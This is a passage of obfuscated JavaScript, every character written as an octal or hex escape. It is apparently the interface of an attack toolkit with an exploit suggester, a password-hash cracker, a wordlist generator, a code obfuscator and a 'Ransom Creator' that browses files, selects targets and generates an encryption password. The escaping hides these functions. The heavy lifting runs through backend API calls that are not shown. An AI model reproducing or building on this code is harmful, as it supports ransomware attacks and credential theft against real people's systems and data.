64\105\x78\x70\x6c\157\x69\164\163\x28\51\40\x7b\12\x9\11\x9\143\x6f\156\x73\164\x20\x63\x6f\x6e\164\141\151\156\145\x72\40\x3d\40\x64\157\143\165\x6d\x65\156\164\56\x67\x65\x74\x45\x6c\145\x6d\x65\156\x74\102\x79\111\144\50\x27\x65\170\x70\154\157\151\x74\x2d\163\x75\147\147\x65\163\164\151\157\x6e\163\47\51\x3b\12\x9\x9\x9\x63\157\156\164\x61\x69\x6e\x65\162\x2e\151\x6e\x6e\x65\162\110\x54\115\x4c\x20\x3d\40\47\74\x70\x3e\101\x6e\141\154\x79\x7a\x69\156\147\40\x73\171\163\x74\x65\x6d\x2e\x2e\56\x3c\57\160\x3e\47\x3b\12\11\11\x9\143\x6f\156\163\x74\40\162\145\x73\40\x3d\x20\141\167\141\x69\164\x20\x74\150\151\x73\56\141\160\x69\50\x27\163\x75\x67\147\x65\163\x74\137\145\170\x70\x6c\x6f\x69\164\x73\x27\51\73\xa\x9\x9\11\x69\146\x20\50\x72\145\x73\x20\x26\x26\40\x72\x65\163\x2e\x73\x74\x61\x74\x75\x73\x20\75\75\75\40\x27\163\x75\143\x63\x65\163\163\x27\51\x20\173\12\11\11\x9\x9\154\x65\164\40\150\164\x6d\154\40\75\x20\140\74\x70\76\74\x73\164\x72\x6f\156\x67\76\117\123\40\x49\x6e\146\157\x3a\74\57\x73\x74\162\x6f\x6e\x67\76\x20\x24\173\162\145\163\56\x6f\x73\x5f\151\156\x66\x6f\x7d\74\x2f\x70\x3e\74\x68\162\x3e\140\73\xa\x9\11\11\11\x72\145\x73\x2e\x73\x75\147\x67\145\163\164\x69\157\x6e\163\56\x66\x6f\162\105\141\x63\x68\50\163\x20\75\76\40\173\xa\11\x9\11\11\x9\x68\164\155\x6c\40\53\x3d\40\140\74\144\151\166\40\x73\164\171\154\x65\x3d\x22\155\x61\x72\147\x69\x6e\x2d\x62\x6f\164\164\x6f\155\x3a\x31\x72\x65\155\x3b\40\x70\x61\x64\x64\151\156\147\72\61\60\x70\x78\x3b\x20\x62\141\x63\153\147\x72\x6f\165\156\144\x3a\166\x61\162\x28\x2d\x2d\142\x67\x2d\x6c\x69\147\150\164\x29\x3b\40\142\x6f\162\144\x65\x72\x2d\162\141\144\x69\x75\163\x3a\66\x70\170\x3b\42\x3e\xa\x9\11\11\x9\x9\11\74\163\164\x72\157\156\x67\76\x24\173\x73\x2e\x74\171\x70\145\175\74\57\x73\164\x72\157\156\147\76\x3c\142\162\76\xa\x9\x9\11\11\x9\11\44\x7b\163\x2e\144\145\x73\143\x72\x69\x70\x74\x69\x6f\156\175\74\x62\162\76\12\x9\x9\11\11\x9\x9\74\x73\x6d\141\x6c\154\76\x53\x65\x61\x72\143\x68\72\40\44\173\x73\x2e\163\145\x61\162\143\150\x7d\x3c\57\x73\155\141\x6c\154\x3e\xa\11\11\11\11\11\x3c\x2f\144\x69\166\x3e\140\x3b\12\x9\x9\11\x9\175\51\x3b\xa\11\11\11\x9\143\x6f\156\164\141\x69\x6e\145\162\56\151\x6e\156\145\162\x48\124\x4d\x4c\40\75\x20\x68\x74\155\154\x3b\12\11\11\11\11\x74\x68\151\x73\x2e\141\144\x64\x4e\157\164\x69\146\151\x63\141\164\151\157\156\50\x27\x45\x78\160\x6c\x6f\151\164\x20\123\x75\147\147\x65\163\x74\145\x72\47\54\40\140\x46\x6f\165\156\144\x20\x24\x7b\162\x65\x73\56\x73\x75\147\x67\145\x73\x74\151\x6f\x6e\163\56\x6c\x65\156\x67\x74\x68\x7d\x20\160\157\164\x65\156\164\151\141\154\x20\x65\170\160\x6c\157\151\164\x73\140\54\40\x27\151\156\x66\x6f\47\x29\73\12\x9\x9\11\x7d\xa\11\x9\x7d\54\xa\x9\11\xa\x9\11\57\x2f\x20\x50\141\x73\163\167\x6f\x72\x64\x20\x43\x72\141\x63\x6b\x65\162\12\11\x9\x61\x73\171\156\x63\x20\x63\x72\141\143\x6b\110\x61\163\x68\x28\51\40\x7b\xa\11\11\11\x63\157\x6e\163\164\x20\150\x61\x73\150\x20\75\x20\x64\157\x63\x75\x6d\x65\156\164\56\147\145\x74\x45\154\145\x6d\x65\x6e\x74\x42\x79\111\x64\50\x27\150\x61\163\150\x2d\x69\x6e\160\x75\164\x27\51\56\x76\x61\154\165\x65\73\12\x9\11\x9\x63\x6f\x6e\163\x74\x20\150\x61\163\150\x54\x79\160\x65\x20\75\x20\144\x6f\143\165\x6d\145\156\x74\56\147\x65\164\x45\x6c\145\x6d\145\x6e\x74\x42\x79\111\x64\x28\47\x68\141\163\x68\55\x74\171\160\145\47\x29\56\166\x61\154\165\145\73\12\x9\x9\11\x69\x66\x20\x28\x21\x68\x61\163\x68\51\40\162\x65\164\x75\162\156\x20\164\x68\x69\x73\x2e\x74\x6f\141\163\164\50\47\110\x61\163\x68\40\151\163\x20\x72\x65\161\165\151\162\145\x64\x2e\47\54\40\47\x65\x72\162\157\162\47\51\x3b\12\11\11\11\x63\x6f\156\163\x74\40\143\x6f\156\164\x61\151\x6e\145\x72\x20\x3d\40\x64\x6f\143\165\155\x65\x6e\164\56\147\x65\x74\105\x6c\145\155\145\x6e\x74\102\x79\x49\x64\50\47\x63\x72\x61\x63\153\x2d\162\x65\163\x75\154\x74\x73\x27\x29\x3b\xa\x9\11\x9\x63\157\x6e\164\141\x69\x6e\x65\162\56\151\x6e\156\145\x72\x48\x54\x4d\114\x20\75\40\47\x3c\x70\x3e\x43\x72\x61\143\x6b\x69\x6e\x67\x20\150\x61\x73\150\x2e\x2e\56\x3c\x2f\x70\76\x27\x3b\xa\x9\11\x9\x63\157\156\x73\x74\40\x72\x65\163\40\x3d\x20\x61\x77\141\x69\164\40\x74\150\151\163\56\x61\x70\151\50\x27\143\162\141\x63\153\x5f\x68\141\x73\x68\x27\54\40\x7b\x20\x68\x61\x73\150\x2c\40\150\x61\163\150\137\164\x79\x70\x65\x3a\40\x68\141\163\x68\124\171\x70\145\x20\x7d\51\73\12\x9\11\x9\x69\146\x20\50\x72\x65\x73\40\46\46\x20\x72\145\163\56\x73\x74\141\x74\165\163\40\75\75\75\40\47\x73\165\143\x63\145\x73\163\47\x29\x20\x7b\xa\x9\11\x9\11\x69\x66\40\x28\162\x65\x73\x2e\162\x65\163\x75\x6c\164\163\56\x63\x72\141\x63\x6b\x65\144\51\40\173\12\x9\11\x9\x9\x9\143\157\156\x74\141\151\156\x65\162\56\151\156\156\145\162\x48\x54\115\114\40\75\40\x60\74\160\40\x73\x74\171\154\x65\x3d\42\143\157\154\157\x72\72\166\141\162\50\x2d\55\x61\143\x63\145\156\164\55\x67\x72\145\145\156\51\73\x22\x3e\74\163\164\162\157\156\147\x3e\103\122\x41\x43\113\105\104\x21\74\x2f\163\x74\x72\157\156\147\76\x3c\x62\162\76\x48\141\x73\x68\40\x54\171\x70\x65\x3a\40\x24\173\x72\x65\163\56\x68\x61\163\150\137\164\x79\160\x65\x7d\x3c\x62\162\76\x50\141\x73\163\x77\x6f\x72\144\x3a\x20\74\x73\164\x72\x6f\x6e\x67\76\x24\173\x72\x65\163\56\x72\x65\x73\165\x6c\164\163\x2e\160\x61\x73\x73\x77\157\162\x64\x7d\x3c\57\163\x74\162\157\156\x67\x3e\74\x2f\160\x3e\140\x3b\12\11\x9\11\x9\x9\164\x68\151\x73\56\x61\x64\144\x4e\157\x74\x69\x66\151\x63\x61\x74\x69\157\156\x28\x27\x50\141\x73\x73\167\x6f\x72\x64\40\103\x72\141\x63\153\145\162\x27\x2c\40\47\x48\141\163\150\x20\143\162\141\143\x6b\145\x64\x20\163\x75\143\143\x65\x73\163\x66\165\154\x6c\x79\x21\x27\54\40\47\x73\x75\143\x63\145\x73\163\x27\x29\x3b\12\x9\x9\x9\x9\175\x20\145\154\x73\x65\40\x7b\12\11\x9\x9\x9\11\x63\157\156\164\x61\151\x6e\145\x72\56\x69\156\x6e\x65\x72\110\x54\115\114\40\x3d\40\140\x3c\160\x3e\110\141\x73\150\x20\x54\171\x70\x65\x3a\x20\44\x7b\162\x65\x73\56\x68\141\x73\x68\x5f\164\x79\160\x65\175\x3c\142\x72\x3e\44\x7b\x72\145\163\56\162\x65\x73\165\154\x74\163\x2e\155\x65\x73\x73\141\x67\x65\175\x3c\57\160\x3e\140\73\xa\x9\11\11\x9\175\xa\11\11\11\x7d\xa\11\11\175\54\xa\11\x9\141\163\171\156\143\40\147\x65\156\x65\162\x61\164\x65\x57\x6f\162\x64\154\x69\163\x74\50\x29\40\x7b\xa\11\x9\11\x63\157\x6e\163\164\x20\x62\x61\x73\x65\x57\x6f\x72\144\163\40\75\x20\144\x6f\x63\x75\x6d\x65\x6e\x74\56\x67\x65\x74\105\154\145\x6d\145\x6e\164\102\171\111\x64\x28\x27\167\x6f\162\x64\154\x69\163\x74\55\x62\141\163\145\x27\51\56\166\141\x6c\x75\x65\73\xa\11\x9\x9\x69\146\x20\50\41\142\x61\x73\x65\127\x6f\x72\144\x73\51\x20\x72\145\164\165\162\x6e\x20\x74\x68\x69\163\56\x74\x6f\x61\163\x74\x28\47\102\141\163\145\40\167\x6f\x72\144\x73\x20\141\x72\145\x20\162\145\161\x75\151\x72\x65\144\56\x27\54\40\47\145\162\x72\x6f\162\x27\51\73\12\11\x9\11\x63\157\x6e\x73\x74\40\x63\x6f\x6e\x74\141\x69\156\145\162\x20\x3d\40\x64\x6f\x63\165\155\x65\x6e\x74\56\147\x65\164\x45\154\145\x6d\145\x6e\164\102\x79\111\x64\x28\47\x77\x6f\x72\144\154\x69\x73\164\x2d\162\145\x73\165\x6c\x74\x73\x27\51\73\12\x9\11\11\143\x6f\156\x74\x61\151\156\145\x72\56\151\156\156\x65\162\110\124\115\114\x20\75\40\x27\x3c\160\x3e\x47\x65\156\145\162\x61\164\x69\156\147\40\x77\x6f\x72\144\154\151\x73\x74\x2e\x2e\x2e\74\57\x70\x3e\x27\73\12\11\11\x9\143\157\156\x73\x74\40\162\145\163\x20\x3d\x20\141\x77\141\x69\164\x20\x74\x68\151\x73\56\x61\x70\151\50\47\147\145\156\145\x72\x61\164\145\137\167\157\x72\x64\154\x69\x73\x74\x27\54\x20\x7b\x20\x62\141\x73\x65\137\167\x6f\162\144\x73\x3a\40\142\141\x73\x65\x57\x6f\162\144\163\40\x7d\x29\x3b\xa\11\x9\11\151\146\40\50\162\x65\x73\40\x26\x26\40\162\x65\x73\56\163\164\x61\164\165\x73\40\75\x3d\75\x20\x27\163\165\143\143\145\163\x73\x27\x29\40\x7b\xa\11\x9\x9\11\x63\157\x6e\164\141\x69\x6e\x65\x72\56\x69\x6e\x6e\x65\x72\110\x54\115\114\40\75\40\140\x3c\160\40\163\x74\171\x6c\145\75\x22\x63\157\x6c\x6f\x72\72\166\141\x72\50\x2d\x2d\x61\x63\x63\x65\x6e\x74\55\147\162\x65\x65\156\x29\x3b\x22\x3e\x47\145\x6e\145\162\141\x74\x65\x64\x20\x24\173\162\145\163\56\143\157\165\x6e\164\x7d\40\x77\157\162\x64\x73\56\74\142\x72\x3e\x46\151\154\145\72\40\44\173\x72\x65\163\x2e\x77\157\162\x64\154\151\x73\164\x5f\146\x69\154\x65\x7d\x3c\57\160\76\140\x3b\12\x9\11\11\x9\164\x68\151\163\56\x61\x64\144\x4e\157\x74\151\x66\x69\x63\x61\164\151\157\x6e\x28\47\x50\141\163\163\x77\x6f\162\144\40\x43\162\141\x63\153\x65\162\47\54\40\x60\x47\145\156\x65\x72\141\164\x65\x64\40\44\173\x72\x65\x73\56\143\157\x75\156\164\x7d\x20\167\157\162\144\154\151\163\164\x20\x65\x6e\x74\162\x69\145\x73\x60\54\40\47\x73\x75\143\x63\145\x73\163\47\51\x3b\12\11\11\x9\x7d\12\11\11\x7d\54\12\11\x9\xa\x9\x9\x2f\57\x20\x43\x6f\x64\x65\40\x4f\x62\146\165\163\x63\141\164\x6f\162\xa\x9\11\x61\163\171\156\x63\40\x6f\142\146\165\x73\x63\x61\164\x65\x43\157\x64\x65\50\51\x20\173\12\11\11\11\143\x6f\156\163\x74\40\143\157\144\x65\40\75\x20\x64\157\x63\165\x6d\145\x6e\x74\56\147\145\164\x45\x6c\x65\x6d\145\156\164\x42\171\x49\144\50\47\x6f\x62\146\x75\x73\143\141\x74\145\55\143\x6f\x64\x65\47\x29\x2e\x76\x61\x6c\165\x65\x3b\xa\11\x9\x9\x63\x6f\x6e\163\164\x20\155\145\x74\x68\157\144\x20\75\40\144\x6f\143\x75\155\x65\x6e\164\x2e\147\145\164\x45\x6c\x65\155\x65\156\x74\102\x79\111\x64\x28\x27\x6f\x62\x66\x75\163\x63\x61\x74\145\x2d\x6d\x65\x74\150\157\x64\47\51\56\166\x61\154\x75\145\73\12\x9\x9\11\151\146\x20\50\x21\143\157\144\x65\x29\x20\162\x65\164\165\x72\x6e\40\164\150\x69\163\56\x74\x6f\141\163\x74\x28\x27\x43\157\x64\x65\x20\x69\163\40\162\145\161\165\151\x72\x65\x64\x2e\x27\54\40\x27\145\x72\162\157\x72\x27\51\73\12\11\x9\11\143\157\x6e\163\164\x20\x6f\165\x74\160\x75\164\105\x6c\x20\x3d\40\x64\157\x63\165\x6d\145\x6e\164\x2e\147\x65\x74\x45\x6c\x65\x6d\145\x6e\164\x42\x79\111\x64\x28\x27\157\x62\x66\x75\x73\x63\141\164\x65\x2d\157\x75\164\160\165\x74\x27\x29\73\12\x9\11\x9\157\x75\x74\160\165\x74\x45\154\56\151\x6e\156\145\162\x54\x65\170\164\40\x3d\x20\47\x4f\142\x66\165\163\x63\x61\x74\x69\156\x67\56\x2e\x2e\x27\x3b\12\x9\11\x9\143\x6f\156\163\164\x20\162\x65\x73\40\75\x20\x61\x77\x61\151\164\40\x74\150\151\163\56\141\x70\x69\x28\x27\157\x62\x66\165\163\x63\141\164\145\x5f\x63\157\x64\145\47\x2c\x20\x7b\x20\x63\157\144\x65\54\x20\x6d\x65\x74\x68\157\x64\40\x7d\51\x3b\12\x9\x9\x9\151\146\x20\50\x72\145\163\40\46\46\x20\162\x65\x73\x2e\163\164\141\164\165\163\40\x3d\75\75\40\x27\163\165\143\x63\x65\163\163\47\x29\x20\173\xa\11\x9\x9\11\x6f\165\x74\160\x75\164\105\154\56\x69\x6e\156\x65\162\x54\x65\x78\x74\x20\x3d\40\x72\145\163\x2e\157\142\x66\x75\x73\x63\141\164\145\144\x3b\12\11\11\11\x9\x74\150\151\163\56\141\x64\x64\x4e\x6f\x74\151\146\151\x63\141\164\151\x6f\156\50\47\103\x6f\144\145\x20\x4f\142\x66\x75\x73\143\x61\x74\157\x72\47\54\x20\x60\x43\157\144\x65\x20\157\142\146\x75\x73\143\141\164\x65\x64\40\50\44\x7b\162\x65\x73\56\x6f\x72\151\x67\151\156\141\x6c\x5f\x73\x69\x7a\145\x7d\x20\342\206\x92\40\44\173\162\x65\163\56\x6f\x62\x66\x75\163\x63\x61\164\145\x64\x5f\163\151\x7a\145\x7d\x20\142\x79\164\145\163\x29\x60\x2c\x20\47\x73\165\143\143\145\x73\163\x27\x29\x3b\12\11\x9\x9\x7d\40\145\x6c\163\x65\x20\173\12\x9\x9\11\11\157\x75\x74\x70\x75\164\x45\154\x2e\x69\156\156\x65\x72\x54\x65\x78\x74\x20\75\40\x72\x65\163\77\56\155\x65\x73\163\x61\x67\x65\40\x7c\x7c\x20\47\117\x62\146\165\163\143\141\x74\151\157\156\x20\x66\141\x69\x6c\x65\x64\56\47\x3b\xa\11\11\x9\x7d\12\11\11\175\54\xa\11\x9\12\x9\x9\57\57\x20\x52\141\x6e\163\x6f\155\40\103\x72\145\x61\x74\157\x72\xa\x9\x9\162\141\x6e\x73\x6f\155\123\145\x6c\x65\143\x74\145\144\106\x69\x6c\145\x73\72\40\x6e\x65\x77\40\123\x65\164\50\x29\54\12\x9\11\x61\163\x79\x6e\x63\x20\162\x61\156\163\157\x6d\x42\x72\157\167\163\x65\106\151\x6c\145\x73\x28\51\40\173\xa\x9\11\x9\143\x6f\x6e\x73\x74\x20\160\x61\x74\150\x20\75\40\144\157\x63\165\x6d\145\156\x74\56\x67\x65\164\105\x6c\x65\x6d\x65\x6e\164\102\x79\x49\144\50\47\x72\141\x6e\163\x6f\155\x2d\142\x72\157\167\163\145\55\160\x61\x74\x68\47\x29\56\166\141\x6c\x75\145\40\x7c\174\x20\x74\x68\151\163\56\143\167\144\73\xa\x9\11\x9\151\146\40\50\x21\x70\141\164\150\51\x20\x72\x65\164\165\x72\x6e\40\164\x68\151\x73\x2e\164\157\x61\x73\x74\50\x27\x50\141\x74\150\x20\x69\x73\x20\162\145\x71\x75\151\162\x65\x64\x2e\x27\54\x20\47\x65\x72\x72\157\x72\x27\x29\x3b\12\11\x9\11\x63\x6f\x6e\163\164\x20\162\x65\x73\40\75\40\141\167\141\151\x74\x20\x74\150\x69\163\x2e\141\x70\151\50\47\x62\162\x6f\167\163\145\x27\x2c\40\173\x20\160\x61\x74\x68\x20\175\51\x3b\xa\11\11\11\x69\x66\40\x28\x72\x65\163\x20\x26\46\40\162\x65\163\x2e\x73\164\x61\x74\x75\163\x20\75\x3d\75\x20\47\x73\x75\x63\x63\145\x73\x73\47\51\x20\173\12\x9\x9\x9\x9\x63\157\156\163\x74\40\143\157\156\164\x61\x69\156\145\x72\40\75\40\144\157\x63\x75\155\x65\156\164\x2e\147\x65\164\x45\154\145\155\145\x6e\164\x42\x79\x49\x64\50\47\x72\x61\x6e\163\x6f\x6d\x2d\146\x69\154\x65\x2d\x73\145\x6c\145\143\164\x6f\162\x27\51\73\12\x9\11\11\x9\x69\146\40\50\41\x63\157\156\164\141\151\x6e\x65\162\x29\x20\x72\x65\x74\x75\x72\x6e\73\12\x9\x9\x9\11\154\145\x74\x20\150\164\155\x6c\x20\x3d\x20\x27\x3c\x64\151\166\40\163\x74\x79\154\145\x3d\42\x64\x69\163\160\154\141\171\72\147\162\151\x64\73\x20\147\162\151\144\55\164\145\155\x70\x6c\x61\x74\x65\x2d\143\x6f\x6c\165\155\x6e\163\72\40\63\60\x70\x78\40\x31\146\x72\x20\141\x75\x74\157\73\x20\x67\x61\x70\72\61\x30\160\170\73\40\x61\154\151\x67\x6e\55\x69\164\145\x6d\163\72\x63\145\156\164\145\162\73\40\155\x61\x72\147\x69\156\x2d\142\x6f\164\x74\x6f\x6d\72\x31\x30\160\170\x3b\40\x70\141\x64\x64\x69\x6e\147\x3a\70\x70\170\73\x20\x62\x61\143\153\147\162\157\165\156\144\x3a\x76\x61\x72\50\55\55\x62\147\x2d\x6d\x65\x64\x29\x3b\40\142\157\162\x64\x65\x72\x2d\162\141\x64\151\x75\x73\72\x34\160\x78\73\42\x3e\74\163\164\162\157\x6e\x67\x3e\x53\145\154\x65\143\164\74\x2f\163\x74\x72\157\156\147\x3e\x3c\x73\164\162\x6f\156\x67\x3e\106\151\x6c\x65\x3c\x2f\x73\x74\162\x6f\x6e\x67\76\x3c\x73\x74\162\157\x6e\147\76\x53\x69\172\145\74\x2f\x73\x74\162\x6f\156\147\76\74\57\x64\151\x76\x3e\47\x3b\12\11\x9\x9\x9\x72\x65\x73\x2e\146\x69\154\x65\x73\x2e\146\x6f\x72\105\141\143\x68\50\146\40\75\76\40\x7b\12\x9\x9\11\11\11\151\x66\40\x28\x66\x2e\151\x73\x5f\144\151\x72\x29\40\162\x65\164\165\x72\156\x3b\x20\57\x2f\40\123\x6b\x69\x70\40\144\151\162\145\x63\x74\157\x72\x69\145\x73\12\11\x9\11\11\x9\143\x6f\x6e\x73\x74\x20\151\163\123\145\x6c\x65\x63\x74\145\144\40\x3d\40\164\x68\151\163\x2e\162\x61\x6e\163\x6f\x6d\123\145\x6c\x65\143\164\x65\x64\106\151\x6c\145\x73\56\150\141\163\x28\146\x2e\160\141\x74\x68\51\73\xa\x9\11\11\x9\x9\x68\x74\155\x6c\40\53\75\40\x60\x3c\x64\151\166\40\x73\164\171\x6c\x65\x3d\42\x64\151\163\x70\154\x61\171\72\147\x72\151\144\73\40\147\162\151\x64\55\164\x65\x6d\x70\154\141\164\x65\x2d\x63\157\x6c\165\155\x6e\163\x3a\40\x33\60\160\x78\40\x31\146\162\x20\x61\165\164\157\x3b\40\147\x61\x70\72\x31\60\160\170\73\x20\x61\x6c\151\147\156\x2d\x69\x74\x65\x6d\163\x3a\143\145\156\164\145\x72\73\40\160\x61\144\144\151\x6e\147\x3a\70\160\170\x3b\x20\142\x61\143\153\x67\x72\x6f\x75\156\144\72\x76\141\x72\50\x2d\55\x62\147\x2d\155\145\x64\51\x3b\x20\142\157\162\144\145\x72\x2d\x72\141\144\x69\165\x73\x3a\64\160\x78\73\x20\143\165\x72\163\x6f\162\72\x70\x6f\x69\x6e\x74\x65\x72\73\x22\x20\x6f\x6e\143\154\151\x63\153\x3d\42\x41\x70\160\x2e\162\x61\156\163\157\155\x54\157\147\x67\x6c\x65\x46\x69\154\x65\x28\x27\44\x7b\146\x2e\x70\141\x74\150\56\x72\x65\x70\x6c\141\x63\x65\50\x2f\47\57\147\x2c\x20\42\x5c\134\47\x22\x29\175\x27\x29\42\x3e\xa\11\11\11\x9\x9\11\x3c\151\156\x70\x75\164\x20\x74\171\160\x65\x3d\x22\x63\150\145\143\x6b\142\157\170\42\40\44\173\151\x73\x53\145\154\x65\x63\164\145\x64\40\77\x20\47\143\150\145\x63\x6b\145\x64\47\40\72\40\x27\x27\175\x20\157\156\143\x68\x61\156\147\145\75\x22\x41\160\x70\x2e\x72\x61\x6e\163\x6f\155\x54\157\x67\x67\154\145\x46\151\154\x65\50\47\x24\x7b\146\x2e\x70\x61\164\x68\56\x72\145\160\154\x61\x63\x65\x28\57\x27\x2f\147\x2c\x20\x22\134\134\47\42\x29\x7d\47\51\x22\x20\163\x74\171\x6c\x65\x3d\42\143\165\162\163\157\x72\x3a\x70\157\x69\156\x74\x65\x72\73\x22\x3e\xa\x9\x9\x9\11\x9\11\74\x73\x70\x61\x6e\40\x73\x74\171\154\x65\75\42\143\157\x6c\x6f\x72\72\x76\x61\x72\x28\x2d\55\x74\x65\170\x74\x2d\x6c\151\x67\150\x74\51\73\x22\76\x24\x7b\x66\56\156\x61\155\145\x7d\x3c\x2f\x73\160\141\x6e\x3e\12\11\x9\11\11\x9\11\74\x73\x70\x61\x6e\x20\x73\x74\171\154\x65\x3d\x22\143\157\154\157\162\72\x76\141\162\50\x2d\x2d\164\x65\x78\164\x2d\155\x65\144\x29\73\40\146\x6f\156\x74\x2d\163\x69\172\145\x3a\60\x2e\71\x72\x65\155\73\42\76\x24\x7b\146\x2e\163\x69\x7a\145\175\x3c\x2f\x73\x70\x61\x6e\x3e\12\11\x9\x9\x9\x9\74\57\x64\151\x76\76\140\x3b\xa\x9\x9\x9\11\x7d\x29\x3b\12\x9\x9\x9\x9\x63\157\156\164\x61\151\x6e\x65\x72\56\x69\x6e\156\x65\x72\x48\x54\115\114\40\75\40\150\x74\155\x6c\73\xa\x9\11\x9\x9\164\150\151\163\x2e\x72\x61\x6e\163\157\155\x55\160\x64\x61\x74\145\103\157\165\156\164\50\x29\73\xa\x9\x9\x9\x7d\40\145\x6c\163\x65\40\173\xa\11\x9\x9\11\x74\150\x69\163\x2e\x74\x6f\141\x73\164\50\47\106\141\x69\154\x65\x64\40\x74\x6f\40\142\162\157\167\x73\x65\x20\146\x69\154\145\x73\x2e\x27\x2c\x20\x27\145\x72\162\157\x72\47\x29\x3b\xa\11\x9\11\x7d\xa\11\11\x7d\x2c\12\x9\11\162\x61\x6e\163\157\x6d\124\x6f\x67\147\x6c\145\106\151\154\x65\50\x66\151\x6c\x65\x50\x61\164\150\x29\40\x7b\xa\11\11\x9\151\x66\x20\x28\164\150\x69\x73\x2e\162\141\156\163\157\155\123\145\x6c\145\x63\164\x65\x64\106\151\x6c\x65\163\56\150\141\x73\50\146\x69\154\x65\x50\141\x74\x68\x29\51\40\x7b\xa\11\11\x9\11\x74\x68\151\x73\56\x72\141\x6e\x73\157\155\123\x65\154\145\x63\164\x65\144\x46\151\x6c\145\163\56\144\x65\154\x65\x74\x65\50\146\x69\x6c\145\120\141\x74\x68\51\73\12\x9\x9\x9\175\40\145\x6c\163\x65\x20\x7b\xa\11\11\x9\x9\164\x68\x69\163\x2e\x72\141\156\x73\157\x6d\123\145\154\145\x63\164\x65\144\x46\151\x6c\145\x73\56\141\144\x64\x28\146\151\x6c\x65\x50\x61\x74\150\x29\73\12\11\x9\11\175\12\x9\11\x9\x74\150\151\163\x2e\x72\x61\156\x73\157\x6d\x55\160\x64\x61\x74\x65\103\x6f\165\x6e\164\x28\51\73\xa\11\x9\11\57\57\40\125\x70\x64\x61\164\x65\40\143\x68\x65\143\153\x62\x6f\170\xa\x9\x9\x9\143\x6f\x6e\x73\x74\x20\143\x6f\x6e\x74\x61\x69\156\x65\x72\x20\x3d\40\x64\x6f\143\x75\155\145\156\x74\56\x67\145\164\x45\x6c\x65\155\145\156\x74\x42\171\111\x64\50\47\x72\x61\x6e\163\x6f\155\55\x66\151\154\x65\x2d\163\145\154\x65\143\164\157\162\47\51\x3b\12\x9\11\11\x69\x66\40\x28\x63\x6f\x6e\x74\141\151\x6e\145\162\x29\40\173\12\11\11\x9\11\143\157\x6e\x73\x74\40\x63\x68\x65\143\153\x62\x6f\x78\145\x73\40\x3d\40\143\x6f\x6e\x74\141\x69\156\x65\162\x2e\x71\165\145\162\x79\x53\x65\x6c\x65\143\x74\x6f\162\101\154\154\x28\47\151\156\x70\x75\x74\133\164\171\x70\145\x3d\42\143\x68\x65\143\x6b\142\x6f\170\x22\x5d\x27\x29\73\12\x9\11\11\11\x63\x68\145\143\153\x62\157\x78\145\x73\x2e\x66\157\x72\105\141\143\150\50\143\x62\x20\x3d\76\40\x7b\xa\11\11\11\11\x9\143\x6f\156\163\164\x20\146\151\154\x65\x44\151\x76\40\x3d\40\143\142\x2e\143\154\157\x73\145\x73\164\50\47\x64\x69\166\x27\51\73\xa\11\11\11\11\x9\151\146\40\x28\146\151\154\145\104\x69\x76\40\46\x26\x20\x66\x69\154\145\x44\151\x76\x2e\x74\x65\170\164\x43\x6f\156\x74\145\156\x74\56\151\156\x63\154\165\144\x65\163\x28\x66\x69\x6c\145\120\141\164\x68\x2e\163\160\154\x69\x74\50\x27\x2f\47\x29\56\160\x6f\160\50\51\x29\51\x20\173\12\11\x9\x9\x9\x9\11\x63\142\x2e\x63\150\145\143\x6b\x65\144\x20\x3d\40\164\150\x69\x73\x2e\162\x61\156\163\157\x6d\x53\145\154\x65\x63\x74\x65\x64\106\151\x6c\145\x73\56\x68\x61\163\x28\146\x69\154\x65\x50\x61\x74\150\51\x3b\12\11\11\x9\11\11\x7d\12\x9\x9\x9\x9\x7d\x29\73\xa\11\11\11\175\12\11\11\175\54\12\11\x9\x72\x61\x6e\163\157\155\x55\160\144\141\164\x65\103\157\165\x6e\164\50\51\x20\x7b\12\x9\11\x9\x63\x6f\x6e\163\x74\40\x63\x6f\165\156\164\x20\75\x20\164\150\x69\163\56\162\x61\156\163\157\x6d\123\x65\x6c\x65\x63\164\x65\x64\106\151\x6c\145\163\x2e\163\x69\172\x65\73\xa\x9\11\11\x63\x6f\x6e\163\x74\40\x63\x6f\x75\x6e\164\x45\154\x20\75\40\144\x6f\143\x75\155\x65\156\x74\x2e\147\x65\x74\x45\154\x65\155\x65\156\164\x42\x79\111\144\50\47\x72\x61\x6e\163\157\155\x2d\x73\145\154\x65\143\164\145\144\x2d\143\157\x75\156\164\x27\x29\73\12\x9\x9\11\143\x6f\156\x73\x74\x20\143\157\165\156\164\116\x75\155\40\x3d\x20\x64\x6f\x63\x75\155\x65\x6e\x74\56\x67\145\164\x45\x6c\145\155\x65\x6e\x74\102\x79\111\x64\x28\47\x72\141\x6e\x73\157\x6d\x2d\143\x6f\x75\x6e\164\x27\51\x3b\xa\11\x9\11\x69\146\40\50\143\x6f\x75\x6e\164\105\x6c\x20\x26\x26\x20\x63\157\165\156\x74\x4e\165\155\x29\40\x7b\xa\11\11\x9\x9\143\157\x75\156\x74\116\x75\155\x2e\x74\145\170\x74\x43\157\156\x74\145\156\x74\40\x3d\x20\x63\x6f\165\x6e\164\73\xa\11\x9\x9\11\x63\x6f\165\x6e\x74\x45\154\56\x73\x74\171\x6c\145\x2e\144\x69\163\x70\154\141\171\40\75\40\x63\x6f\x75\x6e\164\40\x3e\40\60\x20\77\x20\x27\x62\154\x6f\143\153\x27\x20\72\40\x27\156\x6f\x6e\145\47\x3b\12\11\x9\x9\x7d\12\x9\x9\x7d\x2c\xa\x9\x9\162\x61\x6e\163\x6f\x6d\107\145\156\x65\x72\x61\164\145\x50\x61\163\x73\167\x6f\x72\144\50\x29\x20\173\12\x9\x9\11\143\157\156\x73\164\40\143\x68\141\162\x73\40\x3d\40\47\x41\x42\103\104\x45\x46\x47\110\x49\x4a\x4b\114\x4d\x4e\x4f\120\121\x52\x53\x54\125\126\x57\x58\x59\132\141\142\143\x64\145\146\147\x68\151\152\x6b\154\x6d\x6e\157\160\161\x72\163\164\165\166\167\170\171\172\60\61\62\x33\x34\65\x36\67\x38\x39\41\100\x23\x24\45\136\x26\52\47\73\xa\x9\x9\x9\154\x65\x74\40\160\141\163\163\x77\x6f\x72\x64\x20\75\x20\x27\47\x3b\xa\x9\11\x9\146\157\x72\x20\50\x6c\145\x74\40\151\40\75\x20\x30\x3b\x20\x69\x20\x3c\x20\63\x32\73\40\151\x2b\x2b\x29\40\x7b\xa\11\11\x9\x9\x70\141\x73\x73\167\157\x72\x64\40\53\75\40\x63\150\x61\x72\163\x2e\143\150\x61\x72\x41\x74\50\115\x61\164\x68\56\146\154\x6f\x6f\x72\x28\x4d\141\x74\x68\56\162\141\x6e\x64\157\155\x28\x29\x20\52\x20\x63\x68\x61\x72\x73\